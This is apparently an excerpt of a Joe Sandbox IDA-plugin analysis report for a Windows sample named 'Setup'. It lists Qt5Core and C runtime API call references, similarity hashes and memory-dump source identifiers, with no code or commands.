                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?end@$?detach@?dispose@Data@1@Data@1@@$String@@memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 303060116-0
                                                                                                                                                              • Opcode ID: ff3707e131fae7d9a3d3276ebaf0420d30be135d43db068b343d63ca0d43564d
                                                                                                                                                              • Instruction ID: 750b480554c108b9ca812024de8797d2a4d32c8c69915226397ad65a3ac550ea
                                                                                                                                                              • Opcode Fuzzy Hash: ff3707e131fae7d9a3d3276ebaf0420d30be135d43db068b343d63ca0d43564d
                                                                                                                                                              • Instruction Fuzzy Hash: 0261B666A0AB4291EBA1DB31E5402BE6361FF85BD8F405531DE9E43799DE3CE409CF00
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2580228974-0
                                                                                                                                                              • Opcode ID: 1dfe1a16d2e2e47a1e33b12028f82683141502b67750ae19379205a90f3f332e
                                                                                                                                                              • Instruction ID: b4e05c3a17397890ae460366719473aed270a740320a2fb5d05d4c4694c7cc64
                                                                                                                                                              • Opcode Fuzzy Hash: 1dfe1a16d2e2e47a1e33b12028f82683141502b67750ae19379205a90f3f332e
                                                                                                                                                              • Instruction Fuzzy Hash: B641C3A2B0AB8195EF55DB22E9042A9A755BB04BE4F444732DE7D0B7C5DF7CE042CB04
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19C898A,?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49BE
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??0QMutex@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49C8
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49E1
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B11
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B1A
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B35
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8998
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C89F8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8A26
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8A30
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8A5F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$V0@@$Url@@$?dispose@BasicData@1@@Data@@ListMutex@@String@@Timer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3491540594-0
                                                                                                                                                              • Opcode ID: f9a24ce1c1991642a1f84d23c0aeaf99847dc7a908b3a727a23653a1d696b2f9
                                                                                                                                                              • Instruction ID: 492966fe6d8cec1f096b2063373a35db257266f5f5c58b690a2325e3f025726c
                                                                                                                                                              • Opcode Fuzzy Hash: f9a24ce1c1991642a1f84d23c0aeaf99847dc7a908b3a727a23653a1d696b2f9
                                                                                                                                                              • Instruction Fuzzy Hash: EB418E7260A6918BD792CF39E49006D37B0F759B58B085036DF9E43795DE3CE585CB40
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984BA3
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C2A
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C34
                                                                                                                                                              • ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C4B
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C8E
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@V0@@$BasicMutex@@Timer@@Url@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1580018181-0
                                                                                                                                                              • Opcode ID: c0fd210d5eba2ed3c757df3b254f14c8090e210a5cd92ddc8e107506c25b3c98
                                                                                                                                                              • Instruction ID: bd4ff5be209031d0709cfb160f60848de35a84d66673848e4f61f6dadcd5476c
                                                                                                                                                              • Opcode Fuzzy Hash: c0fd210d5eba2ed3c757df3b254f14c8090e210a5cd92ddc8e107506c25b3c98
                                                                                                                                                              • Instruction Fuzzy Hash: B6414DB2A06B0697DB95DB36E49026D73B0FB44B94F404036DB9E83B51EF38E465CB40
                                                                                                                                                              APIs
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F88A7
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F88D1
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F88EF
                                                                                                                                                              • ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F8917
                                                                                                                                                              • ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F8931
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??8@String@@0@$DateTime@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 7445742-0
                                                                                                                                                              • Opcode ID: f173f43a48de264e32183795082b866f6c6035ab2a9b0a3fcfccda9672384c71
                                                                                                                                                              • Instruction ID: 5076f151132b6aedd53f7f99487f8243c3c20902a7328be351dd7a2dd6b562ab
                                                                                                                                                              • Opcode Fuzzy Hash: f173f43a48de264e32183795082b866f6c6035ab2a9b0a3fcfccda9672384c71
                                                                                                                                                              • Instruction Fuzzy Hash: 903199E2A0A59256EFC38B65E184138A761EF04F8874C9031CEAC1B14ADF19D8E7CB12
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Mutex@@$?dispose@?lock@CriticalData@1@@Data@@EnterInit_thread_footerListLocker@@MutexRecursiveSection
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2842785555-0
                                                                                                                                                              • Opcode ID: 1f88512245a97524200e81daf7d2fa84940e51dcec8ca16cc7205a568e7d8045
                                                                                                                                                              • Instruction ID: a735f010c3a82a697d9d60f0b4f4e5c5cb349896d288a9b9400b384633bcfc7f
                                                                                                                                                              • Opcode Fuzzy Hash: 1f88512245a97524200e81daf7d2fa84940e51dcec8ca16cc7205a568e7d8045
                                                                                                                                                              • Instruction Fuzzy Hash: D3412EB191FA8285EBA29B34E45127A6360EF51770F944137DD6E562A1EF2CE844CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ?createData@QMapDataBase@@SAPEAU1@XZ.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E472
                                                                                                                                                              • ?recalcMostLeftNode@QMapDataBase@@QEAAXXZ.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E4CC
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?createNode@QMapDataBase@@QEAAPEAUQMapNodeBase@@HHPEAU2@_N@Z.QT5CORE ref: 00007FFBA1A3DA78
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3DA91
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?color@QMapNodeBase@@QEBA?AW4Color@1@XZ.QT5CORE ref: 00007FFBA1A3DA9A
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?setColor@QMapNodeBase@@QEAAXW4Color@1@@Z.QT5CORE ref: 00007FFBA1A3DAA5
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A3DAC6
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A3DAF1
                                                                                                                                                              • ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E49A
                                                                                                                                                              • ?createNode@QMapDataBase@@QEAAPEAUQMapNodeBase@@HHPEAU2@_N@Z.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E51C
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E531
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?setData$?createNode@Parent@U1@@$Array@@ByteU2@_V0@@$?color@?recalcColor@Color@1@Color@1@@Data@LeftMost
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1714010273-0
                                                                                                                                                              • Opcode ID: 9391b1b43476b4c04b66880d53b66047a423e08cd1e3a77b7e9aaf74f70e4edb
                                                                                                                                                              • Instruction ID: df9eae535ea6fb2003920884f35e155364d7d57bc1afade916c0c72cfad6be71
                                                                                                                                                              • Opcode Fuzzy Hash: 9391b1b43476b4c04b66880d53b66047a423e08cd1e3a77b7e9aaf74f70e4edb
                                                                                                                                                              • Instruction Fuzzy Hash: F0316B7AA0AB0586DB55CF26E44422DB3A0FB88F90B048536DF6D437A5EF3DE815CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B521F
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B522B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B523D
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B524A
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B5257
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B625
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B630
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B642
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B64E
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B65A
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?size@Data@@ListString@@$?begin@?data@Char@@$?end@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1839457078-0
                                                                                                                                                              • Opcode ID: b3a94d31746325542fb43f3870e4b07d46b3f8730d1759387a948fed7d80bb49
                                                                                                                                                              • Instruction ID: d8f55fbd2890d9e44316409a0f4a4c1109fa556da4e45c3b3db8f35938b08010
                                                                                                                                                              • Opcode Fuzzy Hash: b3a94d31746325542fb43f3870e4b07d46b3f8730d1759387a948fed7d80bb49
                                                                                                                                                              • Instruction Fuzzy Hash: 8E314FA2A0EA4691EF91DF21E4441A867A5FB44B98F848432EE4D07795EF3CE586CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66A5
                                                                                                                                                              • ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66B3
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66DC
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66E6
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F671E
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
Memory Dump Source
• Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BasicTimer@@Url@@$Mutex@@V0@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1508731206-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(00000000,?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B1F
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B37
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B46
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B55
                                                                                                                                                                • Part of subcall function 00007FFBA1A25380: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,00000000,00007FFBA1A256F9), ref: 00007FFBA1A253B6
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A26BCE
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$ArrayDataPtr@@@$A@$$CriticalEnterInit_thread_footerSectionV0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3140829187-0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA1994380
                                                                                                                                                              • ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199438E
                                                                                                                                                              • ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199439C
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943D1
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943DB
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@Url@@V0@@$BasicTimer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2465205131-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3BB
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3C4
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3D0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3DC
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3F7
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Array@@ByteData@1@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3506969666-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$BasicCriticalEnterInit_thread_footerMutex@@SectionTimer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1489054416-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11D6
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11DF
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11EB
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11F7
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E121C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 437555178-0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE ref: 00007FFBA19940D6
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA19940E0
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA19940EA
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA1994380
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199438E
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199439C
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943D1
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??1QUrl@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943DB
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE ref: 00007FFBA1994116
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA199412B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$Url@@V0@@$BasicTimer@@$?setHost@Mode@1@@Mutex@@ParsingString@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2612093776-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?className@QMetaObject@@QEBAPEBDXZ.QT5CORE ref: 00007FFBA1979214
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE ref: 00007FFBA1979228
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197653F), ref: 00007FFBA197925C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197653F), ref: 00007FFBA1979269
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19792AB
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$?class?registerFlag@Flags@Init_thread_footerName@NormalizedObject@@Object@@@TypeType@Type@@Type@@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 521780993-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B625
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B630
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B642
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B64E
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B65A
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@$?data@Char@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 315989962-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?host@A@$$Array@@ByteComponentFlags@FormattingOption@Url@@Url@@@@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2158357590-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F7143
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F7157
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F716C
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F717B
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A03020), ref: 00007FFBA19F718A
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?scheme@A@$$Array@@ByteUrl@@V0@@
